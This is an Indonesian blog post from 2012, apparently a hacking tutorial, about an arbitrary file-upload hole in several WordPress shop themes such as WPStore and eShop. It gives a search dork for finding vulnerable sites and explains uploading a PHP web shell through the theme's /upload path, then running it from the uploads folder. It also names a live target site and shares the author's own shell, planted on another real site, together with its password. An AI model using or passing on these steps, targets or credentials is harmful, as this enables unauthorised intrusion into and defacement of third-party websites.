Sabtu, 02 Juni 2012

Vulnerability Themes Wordpress.

dork : inurl:/wp-content/themes/WPstore/


kita dapat meng-upload backdoor dengan vulnerability ini:


1. WPStore


2. eShop


3. KidzStore


4. Emporium


5. Store




klo udah dpet target, kita tambah /UPLOAD di target tersebut...
http://www.target.com/wp-content/themes/Wpstore/upload

selanjutnya akan muncul file upload,sekarang kita upload shell kesayangan.... klo udah di upload, tinggal eksekusi shell kita... caranya : http://www.target.com/wp-content/uploads/products_img/namashell.php


selesai dehhh..... sekrang terserah mau di apain tuh sitenya... :D


klo msih bngung, sya ksih live targetnya...http://www.davidsteele.com/wp-content/themes/WPStore/upload/

tinggal upload shell..... klo nt blm pnya shell bsa pke pnya sya.. 
http://faithinmodernsteel.com/wp-admin/includes/log.php


..passwrd di isi : kerinci


source om Farid Ingin Belajar


Semoga bermanfaat dan selamat mencoba..
Saatnya berkata "HamdallAh"

1 komentar: